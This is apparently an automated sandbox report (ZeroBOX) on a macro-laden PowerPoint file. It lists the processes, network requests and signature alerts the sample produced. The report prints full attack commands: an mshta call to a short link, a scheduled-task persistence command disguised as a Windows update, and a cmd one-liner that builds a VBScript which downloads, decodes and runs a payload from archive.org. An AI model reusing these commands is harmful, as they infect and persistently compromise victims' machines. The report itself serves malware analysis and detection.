Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 14, 2021, 6:05 p.m.	April 14, 2021, 6:07 p.m.

Size	68.5KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: construction sites map, Subject: construction sites map, Author: jossy, Keywords: construction sites map, Last Saved By: Master Mana, Revision Number: 3, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 27:44, Create Time/Date: Tue Apr 13 10:01:41 2021, Last Saved Time/Date: Tue Apr 13 10:29:25 2021, Number of Words: 0
MD5	`e4e0b90a51833e6cf49113c06fa1a686`
SHA256	`9bf85cb7170617b4e3c0055ed8505fa9334260c48b15a1fe731fde19708217ec`
CRC32	`F087D81F`
ssdeep	`384:lKAfG7FUYFEFlmzem7sCiECRgWH0IT13qOnMFP6WWk4WDclFo39D:WUYFCmygiEslH0+ZnMFiW9cjo`
Yara	Microsoft_Office_Document_Zero - Microsoft Office Document Signature Zero Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE" /S "C:\Users\test22\AppData\Local\Temp\Company profile.ppt"
2332
- mshta.exe MsHTa HTTp://j.mp/guwkqbhskagshjtyuiwqbh
  888
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\")
    2672
  - cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
    1808
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
      2668
  - cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
    1932
    - taskkill.exe taskkill /f /im winword.exe
      1916
    - taskkill.exe taskkill /f /im EXCEL.exe
      1124

Name	Response	Post-Analysis Lookup
ajmeinthakahowahun.blogspot.com	CNAME blogspot.l.googleusercontent.com A 216.58.220.193	172.217.25.97
archive.org	A 207.241.224.2	207.241.224.2
ia801408.us.archive.org	A 207.241.228.148	207.241.228.148
ia801403.us.archive.org	A 207.241.228.143	207.241.228.143
google.com	A 216.58.221.238	172.217.161.46
www.blogger.com	A 216.58.197.105 CNAME blogger.l.google.com	142.250.196.105
resources.blogblog.com	A 172.217.31.233 CNAME blogger.l.google.com	142.250.196.105
j.mp	A 67.199.248.17 A 67.199.248.16	67.199.248.16

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.31.233	Active	Moloch
207.241.228.143	Active	Moloch
207.241.228.148	Active	Moloch
216.58.197.105	Active	Moloch
216.58.220.193	Active	Moloch
216.58.221.238	Active	Moloch
67.199.248.16	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49211 -> 172.217.31.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 216.58.197.105:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49221 -> 207.241.228.148:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49208 -> 216.58.197.105:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49222 -> 207.241.228.143:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 172.217.31.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 216.58.220.193:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49211 172.217.31.233:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com	38:94:3b:5a:12:31:3f:33:76:c6:d4:70:c0:80:73:0d:ed:92:30:ea
TLSv1 192.168.56.101:49209 216.58.197.105:443	None	None	None
TLSv1 192.168.56.101:49208 216.58.197.105:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com	38:94:3b:5a:12:31:3f:33:76:c6:d4:70:c0:80:73:0d:ed:92:30:ea
TLSv1 192.168.56.101:49221 207.241.228.148:443	C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2	OU=Domain Control Validated, CN=*.us.archive.org	9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0
TLSv1 192.168.56.101:49222 207.241.228.143:443	C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2	OU=Domain Control Validated, CN=*.us.archive.org	9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0
TLSv1 192.168.56.101:49210 172.217.31.233:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com	38:94:3b:5a:12:31:3f:33:76:c6:d4:70:c0:80:73:0d:ed:92:30:ea
TLSv1 192.168.56.101:49206 216.58.220.193:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=misc-sni.blogspot.com	f0:64:7d:39:9a:3a:49:e8:7f:12:e6:d1:96:cb:9b:65:6d:43:4a:52

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: SUCCESS: The scheduled task "WIND0WSUPLATE" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: ERROR: The process "winword.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: ERROR: The process "EXCEL.exe" not found. console_handle: 0x0000000b	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 14, 2021, 6:07 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://ia801403.us.archive.org/0/items/divine2_20210411_1858/divine2.txt

Performs some HTTP requests (14 events)

request	GET http://j.mp/guwkqbhskagshjtyuiwqbh
request	GET https://ajmeinthakahowahun.blogspot.com/p/divine2222.html
request	GET https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
request	GET https://www.blogger.com/static/v1/jsbin/1277698886-ieretrofit.js
request	GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9202096335134795169&zx=40a67cbf-2c8f-4258-a13a-81794be5b191
request	GET https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
request	GET https://www.blogger.com/static/v1/widgets/1893845785-widgets.js
request	GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif
request	GET https://resources.blogblog.com/img/icon18_wrench_allbkg.png
request	GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
request	GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
request	GET https://www.blogger.com/img/share_buttons_20_3.png
request	GET https://ia801408.us.archive.org/25/items/defender_202103/defender.txt
request	GET https://ia801403.us.archive.org/0/items/divine2_20210411_1858/divine2.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 163 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 14, 2021, 6:05 p.m.	process_identifier: 2332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d2c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:05 p.m.	process_identifier: 2332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x65001000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2021, 6:05 p.m.	process_identifier: 2332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2021, 6:05 p.m.	process_identifier: 2332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x045f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2021, 6:05 p.m.	process_identifier: 2332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 14, 2021, 6:05 p.m.	process_identifier: 2332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ea42000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ce9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cea000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cea000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ceb000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ceb000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ceb000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cec000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cec000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cec000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cec000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03ced000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cee000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cee000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03cef000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03df0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03df0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03df0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03df0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 14, 2021, 6:07 p.m.	process_identifier: 888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03df0000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

POWERPNT.EXE tried to sleep 139 seconds, actually delayed analysis time by 139 seconds

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\1893845785-widgets[1].js
file	C:\Users\Public\SiggiaW.vbs
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\1277698886-ieretrofit[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\3858658042-comment_from_post_iframe[1].js

Creates a suspicious process (5 events)

cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\")
cmdline	"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
cmdline	MsHTa HTTp://j.mp/guwkqbhskagshjtyuiwqbh
cmdline	"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\")

Executes one or more WMI queries (2 events)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EXCEL.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe")

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 14, 2021, 6:07 p.m.	show_type: 0 filepath_r: schtasks parameters: /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\") filepath: schtasks	1	1	0
